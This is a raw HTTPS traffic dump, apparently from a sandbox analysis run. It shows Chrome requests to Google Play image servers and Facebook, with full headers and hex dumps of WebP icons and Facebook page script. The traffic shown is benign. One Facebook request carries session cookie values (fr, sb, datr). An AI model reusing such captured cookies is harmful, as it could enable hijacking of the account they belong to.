                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC686INData Raw: 52 49 46 46 a6 02 00 00 57 45 42 50 56 50 38 4c 99 02 00 00 2f 3f c0 0f 00 05 25 6a db 0c 49 d6 3f c6 d2 5c 71 65 db f6 b5 6d db b6 6d fb de b1 6d db b6 da b6 f5 2e fe 88 c8 88 bc ab d9 45 f4 7f 02 e4 f2 f6 d4 67 de 7a fb cd 7b ba fe 3f 7a cf 38 5e 88 3d 73 d7 e7 71 fb 26 85 e8 47 ee 89 d1 1b c5 f8 bd 30 26 2e 87 f1 3f 3f 16 6d 0a 31 67 6e fe ee a1 81 22 32 e5 a5 ff 0e 94 9b 38 1d 83 76 e5 18 57 75 17 f7 c7 0e 1b 48 0b 57 8c de 2c 1e 87 25 28 2e 86 3a 8d 7e 5a fc ce 50 ac 0b f3 0d 7a ac f8 7e 4f f1 68 90 1a 75 97 f8 ff 46 15 86 58 0a 30 47 42 ee 06 f8 33 40 0d 90 2b 8e 0f ac 3a 9b 91 95 76 62 f1 35 0e 52 09 94 fa fb 01 e0 2d db 2b b9 d8 53 ee b2 fd 01 f0 91 b7 f3 40 81 58 77 e2 3e cb 22 55 c0 09 6f 00 f3 2d c7 89 3a c3 b2 0e c0 d7 07 6a 80 69 31 c6 b3 1b
                                                                                                                                                                                                                                  Data Ascii: RIFFWEBPVP8L/?%jI?\qemmm.Egz{?z8^=sq&G0&.??m1gn"28vWuHW,%(.:~ZPz~OhuFX0GB3@+:vb5R-+S@Xw>"Uo-:ji1


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  110192.168.2.649953216.58.212.1504431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1088OUTGET /d6Y9q1SJXDASeD-93qMXL59Bq_JCd6Bm1cZr_zodlkVnq4ck3TpTWYcMpBwOsUGMQHw=s64-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://play.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC529INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 326
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:46 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 04:53:46 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Age: 0
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC326INData Raw: 52 49 46 46 3e 01 00 00 57 45 42 50 56 50 38 4c 31 01 00 00 2f 3f c0 0f 00 85 5c 5b db 8e 3d 7a ce 2a 2b 7d 8e c2 e9 54 a7 b6 9d d2 b6 6d db b6 6d 6b 3c 73 15 df fb 7e ff 7c ef 18 45 44 ff 27 40 fe 33 d8 58 dd a0 0b a9 ab 4d 51 25 d7 d6 a6 eb 42 eb ea c2 1d 01 74 cd b0 ae 5a 03 5a 34 43 30 62 4a 3d 2c ab 96 00 86 54 7d 30 f8 8d 30 f3 cd b1 f6 4d d5 1d 02 7b df 52 8b ec 01 67 df 50 ab c8 1a 70 23 bd df 90 cc 00 37 03 06 55 ba 26 43 28 1d bb be 51 5e bf 7c 05 69 31 c3 b6 6b 52 61 da 86 6a 1d ba 54 92 09 8c 3a 12 1b 61 3b 2a 58 15 14 15 ed a9 91 80 a8 68 7f 47 7e ff bf b9 7f a3 2b 79 7e 1a 55 55 3e 3f 9c e8 2e 1f 9e 33 1c 01 74 8d b0 a2 6a 03 5a 54 43 40 89 29 f5 b0 ac 6a 05 f0 b0 f8 01 14 7d 23 97 96 87 6f 89 62 91 26 be 9d 07 40 dc 81 fb 6f 65 62 09 d6 0e
                                                                                                                                                                                                                                  Data Ascii: RIFF>WEBPVP8L1/?\[=z*+}Tmmk<s~|ED'@3XMQ%BtZZ4C0bJ=,T}00M{RgPp#7U&C(Q^|i1kRajT:a;*XhG~+y~UU>?.3tjZTC@)j}#ob&@oeb


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  111192.168.2.649958157.240.0.354431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC516OUTGET /ajax/webstorage/process_keys/?state=1 HTTP/1.1
                                                                                                                                                                                                                                  Host: www.facebook.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC310INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                                  Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                                                                  X-FB-Debug: empd8EoUgjul8u6efHKm5s7S6MFzNGeMaeRM/o4QwYZ9FIxyWN9ozCPJrJxjQotEADST4ULm19Lg4RmgVsDMlw==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:46 GMT
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC2669INData Raw: 50 72 6f 78 79 2d 53 74 61 74 75 73 3a 20 68 74 74 70 5f 72 65 71 75 65 73 74 5f 65 72 72 6f 72 3b 20 65 5f 66 62 5f 63 6f 6e 66 69 67 76 65 72 73 69 6f 6e 3d 22 41 63 4b 33 70 30 57 50 42 55 7a 70 5a 5a 6a 4e 75 2d 64 57 5a 46 6c 76 6c 63 2d 50 2d 56 77 52 6a 71 4a 63 50 61 44 6a 41 4e 62 78 61 39 51 61 32 30 66 32 37 77 73 6e 6b 4a 39 52 53 77 22 3b 20 65 5f 63 6c 69 65 6e 74 61 64 64 72 3d 22 41 63 4b 63 32 34 53 63 59 45 6e 73 35 51 6e 32 32 39 6a 61 58 59 78 72 66 6f 67 50 79 41 6a 4d 68 5a 77 42 38 67 37 34 75 4b 67 6f 50 44 78 4c 64 44 31 30 77 31 6c 4f 2d 6e 71 35 78 50 4e 6d 30 52 48 46 72 4b 6a 53 6b 69 2d 6c 59 75 39 36 70 44 47 4a 6d 61 5f 43 74 49 35 52 33 4e 7a 54 45 65 30 4c 37 69 47 6f 62 6f 7a 53 66 75 56 58 7a 41 22 3b 20 65 5f 66 62 5f
                                                                                                                                                                                                                                  Data Ascii: Proxy-Status: http_request_error; e_fb_configversion="AcK3p0WPBUzpZZjNu-dWZFlvlc-P-VwRjqJcPaDjANbxa9Qa20f27wsnkJ9RSw"; e_clientaddr="AcKc24ScYEns5Qn229jaXYxrfogPyAjMhZwB8g74uKgoPDxLdD10w1lO-nq5xPNm0RHFrKjSki-lYu96pDGJma_CtI5R3NzTEe0L7iGobozSfuVXzA"; e_fb_
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC51INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: Alt-Svc: h3=":443"; ma=86400Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1470INData Raw: 61 62 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 66 74 72 76 36 78 32 65 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b
                                                                                                                                                                                                                                  Data Ascii: ab1<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="ftrv6x2e">function envFlush(a){function b(b){for(var c in a)b[c]=a[
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1274INData Raw: 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 79 62 2f 72 2f 68 4c 52 4a 31 47 47 5f 79 30 4a 2e 69 63 6f 22 20 2f 3e 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 58 2f 6c 2f 30 2c 63 72 6f 73 73 2f 63 61 63 34 39 51 74 47 32 4c 64 2e 63 73 73 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 77 58 61 56 6f 6c 67 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65
                                                                                                                                                                                                                                  Data Ascii: .xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yX/l/0,cross/cac49QtG2Ld.css" data-bootloader-hash="wXaVolg" crossorigin="anonymous" /><link type="text/css" rel="styleshe
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1500INData Raw: 63 62 31 61 0d 0a 70 6c 22 2c 22 53 65 72 76 65 72 4a 53 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 54 69 6d 65 53 6c 69 63 65 2c 53 65 72 76 65 72 4a 53 29 7b 28 6e 65 77 20 53 65 72 76 65 72 4a 53 28 29 29 2e 68 61 6e 64 6c 65 28 7b 22 64 65 66 69 6e 65 22 3a 5b 5b 22 63 72 3a 33 31 30 22 2c 5b 22 52 75 6e 57 57 57 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 52 75 6e 57 57 57 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 32 36 22 2c 5b 22 54 69 6d 65 53 6c 69 63 65 49 6d 70 6c 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 54 69 6d 65 53 6c 69 63 65 49 6d 70 6c 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 33 37 32 35 22 2c 5b 22 63 6c 65 61 72 54 69 6d 65 6f 75 74 57 57 57 4f 72 4d 6f 62 69 6c 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 63 6c 65 61 72
                                                                                                                                                                                                                                  Data Ascii: cb1apl","ServerJS"],function(TimeSlice,ServerJS){(new ServerJS()).handle({"define":[["cr:310",["RunWWW"],{"__rc":["RunWWW",null]},-1],["cr:1126",["TimeSliceImpl"],{"__rc":["TimeSliceImpl",null]},-1],["cr:3725",["clearTimeoutWWWOrMobile"],{"__rc":["clear
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1500INData Raw: 5f 73 65 74 22 3a 5b 22 61 63 72 4a 54 68 39 57 47 64 70 22 2c 22 31 6f 4f 45 36 34 66 4c 34 77 4f 22 2c 22 37 72 36 6d 53 50 37 6f 66 72 32 22 5d 7d 7d 2c 32 35 38 30 5d 2c 5b 22 53 65 72 76 65 72 54 69 6d 65 44 61 74 61 22 2c 5b 5d 2c 7b 22 73 65 72 76 65 72 54 69 6d 65 22 3a 31 37 32 37 35 38 35 36 32 36 35 32 31 2c 22 74 69 6d 65 4f 66 52 65 71 75 65 73 74 53 74 61 72 74 22 3a 31 37 32 37 35 38 35 36 32 36 35 30 37 2e 36 2c 22 74 69 6d 65 4f 66 52 65 73 70 6f 6e 73 65 53 74 61 72 74 22 3a 31 37 32 37 35 38 35 36 32 36 35 30 37 2e 36 7d 2c 35 39 34 33 5d 2c 5b 22 55 52 4c 46 72 61 67 6d 65 6e 74 50 72 65 6c 75 64 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 68 61 73 68 74 61 67 52 65 64 69 72 65 63 74 22 3a 74 72 75 65 2c 22 66 72 61 67 42 6c 61 63 6b 6c
                                                                                                                                                                                                                                  Data Ascii: _set":["acrJTh9WGdp","1oOE64fL4wO","7r6mSP7ofr2"]}},2580],["ServerTimeData",[],{"serverTime":1727585626521,"timeOfRequestStart":1727585626507.6,"timeOfResponseStart":1727585626507.6},5943],["URLFragmentPreludeConfig",[],{"hashtagRedirect":true,"fragBlackl
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1500INData Raw: 6f 6e 65 22 7d 2c 22 73 66 61 75 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 75 73 69 64 61 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 76 70 64 22 3a 7b 22 74 22 3a 35 31 38 34 30 30 30 2c 22 73 22 3a 22 4c 61 78 22 7d 2c 22 77 64 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4c 61 78 22 7d 2c 22 77 6c 5f 63 62 76 22 3a 7b 22 74 22 3a 37 37 37 36 30 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 78 2d 72 65 66 65 72 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 78 2d 73 72 63 22 3a 7b 22 74 22 3a 31 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 7d 2c 32 31 30 34 5d 2c 5b 22 43 75 72 72 65 6e 74 55 73 65 72 49 6e 69 74 69 61 6c 44 61 74 61 22 2c 5b 5d 2c 7b 22 41 43 43 4f 55 4e 54 5f 49 44 22 3a 22 30 22 2c 22 55 53 45 52 5f 49 44 22 3a
                                                                                                                                                                                                                                  Data Ascii: one"},"sfau":{"s":"None"},"usida":{"s":"None"},"vpd":{"t":5184000,"s":"Lax"},"wd":{"t":604800,"s":"Lax"},"wl_cbv":{"t":7776000,"s":"None"},"x-referer":{"s":"None"},"x-src":{"t":1,"s":"None"}},2104],["CurrentUserInitialData",[],{"ACCOUNT_ID":"0","USER_ID":
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1500INData Raw: 72 73 69 6f 6e 22 3a 30 2c 22 62 72 6f 77 73 65 72 4e 61 6d 65 22 3a 22 43 68 72 6f 6d 65 22 2c 22 62 72 6f 77 73 65 72 56 65 72 73 69 6f 6e 22 3a 31 31 37 2c 22 64 65 76 69 63 65 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 65 6e 67 69 6e 65 4e 61 6d 65 22 3a 22 42 6c 69 6e 6b 22 2c 22 65 6e 67 69 6e 65 56 65 72 73 69 6f 6e 22 3a 22 31 31 37 2e 30 2e 30 2e 30 22 2c 22 70 6c 61 74 66 6f 72 6d 41 72 63 68 69 74 65 63 74 75 72 65 22 3a 22 36 34 22 2c 22 70 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 22 2c 22 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 22 3a 22 31 30 22 2c 22 70 6c 61 74 66 6f 72 6d 46 75 6c 6c 56 65 72 73 69 6f 6e 22 3a 22 31 30 22 7d 2c 35 32 37 5d 2c 5b 22 50 72 6f 6d 69 73 65 55 73 65 50 6f 6c 79 66 69 6c 6c 53
                                                                                                                                                                                                                                  Data Ascii: rsion":0,"browserName":"Chrome","browserVersion":117,"deviceName":"Unknown","userName":"Blink","userVersion":"117.0.0.0","platformArchitecture":"64","platformName":"Windows","platformVersion":"10","platformFullVersion":"10"},527],["PromiseUsePolyfillS
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1500INData Raw: 61 6d 5f 70 61 67 65 5f 6c 6f 61 64 5f 70 72 6f 6d 69 73 65 5f 74 69 6d 65 6f 75 74 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 62 69 67 70 69 70 65 5f 70 6c 75 67 69 6e 73 22 3a 66 61 6c 73 65 7d 2c 39 30 37 5d 2c 5b 22 63 72 3a 37 37 33 30 22 2c 5b 22 67 65 74 46 62 74 52 65 73 75 6c 74 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 67 65 74 46 62 74 52 65 73 75 6c 74 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 38 39 30 36 22 2c 5b 22 67 6f 55 52 49 57 57 57 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 67 6f 55 52 49 57 57 57 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 32 35 31 30 30 22 2c 5b 22 52 75 6e 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 52 75 6e 42 6c 75 65 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 37 33 38 36
                                                                                                                                                                                                                                  Data Ascii: am_page_load_promise_timeout":false,"enable_bigpipe_plugins":false},907],["cr:7730",["getFbtResult"],{"__rc":["getFbtResult",null]},-1],["cr:8906",["goURIWWW"],{"__rc":["goURIWWW",null]},-1],["cr:925100",["RunBlue"],{"__rc":["RunBlue",null]},-1],["cr:7386
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1500INData Raw: 6f 6e 64 61 72 79 47 72 6f 75 70 53 69 7a 65 22 3a 33 7d 2c 22 6e 75 6d 62 65 72 69 6e 67 53 79 73 74 65 6d 44 61 74 61 22 3a 6e 75 6c 6c 7d 2c 35 34 5d 2c 5b 22 53 65 73 73 69 6f 6e 4e 61 6d 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 73 65 65 64 22 3a 22 31 79 58 35 22 7d 2c 37 35 37 5d 2c 5b 22 5a 65 72 6f 43 61 74 65 67 6f 72 79 48 65 61 64 65 72 22 2c 5b 5d 2c 7b 7d 2c 31 31 32 37 5d 2c 5b 22 5a 65 72 6f 52 65 77 72 69 74 65 52 75 6c 65 73 22 2c 5b 5d 2c 7b 22 72 65 77 72 69 74 65 5f 72 75 6c 65 73 22 3a 7b 7d 2c 22 77 68 69 74 65 6c 69 73 74 22 3a 7b 22 5c 2f 68 72 5c 2f 72 22 3a 31 2c 22 5c 2f 68 72 5c 2f 70 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 75 6e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 70
                                                                                                                                                                                                                                  Data Ascii: ondaryGroupSize":3},"numberingSystemData":null},54],["SessionNameConfig",[],{"seed":"1yX5"},757],["ZeroCategoryHeader",[],{},1127],["ZeroRewriteRules",[],{"rewrite_rules":{},"whitelist":{"\/hr\/r":1,"\/hr\/p":1,"\/zero\/unsupported_browser\/":1,"\/zero\/p


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  112192.168.2.649961142.250.185.2464431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC521OUTGET /mw_NfsvKM8m6RPv8Fz2GQawCOsqWv010saMnc7zbWalMxuaA9IY8h7E0VMieLxSxAFB98NFeYqbFrXXq=w48-h16-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC532INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 148
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:18:01 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 04:18:01 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  Age: 2145
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC148INData Raw: 52 49 46 46 8c 00 00 00 57 45 42 50 56 50 38 4c 7f 00 00 00 2f 0f c0 03 10 85 d3 6a db 96 e5 dd e9 9f 00 5d 40 47 80 c4 04 16 35 31 81 bb 43 a2 ba 47 92 33 82 bb 3c e1 fd fe 77 86 88 23 ff 4f 00 a0 f0 b0 d3 7b 15 50 bd d9 ec 49 29 a5 89 88 88 9b 8d ee 54 1f 2f 5d a9 d8 f6 11 a9 b0 7d 1d 11 31 5e f0 8e 7c d1 b6 7e 13 7d d9 a4 42 d9 cd 42 25 c7 8c 4a 50 cb f6 25 d9 ac 5c b2 ce ac 25 c8 e8 b5 24 98 0d 4b fa 59 2c 22 e8 5c 1a 16 2f 3f 23 02 00
                                                                                                                                                                                                                                  Data Ascii: RIFFWEBPVP8L/j]@G51CG3<w#O{PI)T/]}1^|~}BB%JP%\%$KY,"\/?#


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  113192.168.2.649963142.250.185.2464431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC504OUTGET /VRMWkE5p3CkWhJs6nv-9ZsLAs1QOg5ob1_3qg-rckwYW7yp1fMrYZqnEFpk0IoVP4LM=s52-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC530INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 2956
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:45 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 04:53:45 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  Age: 1
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
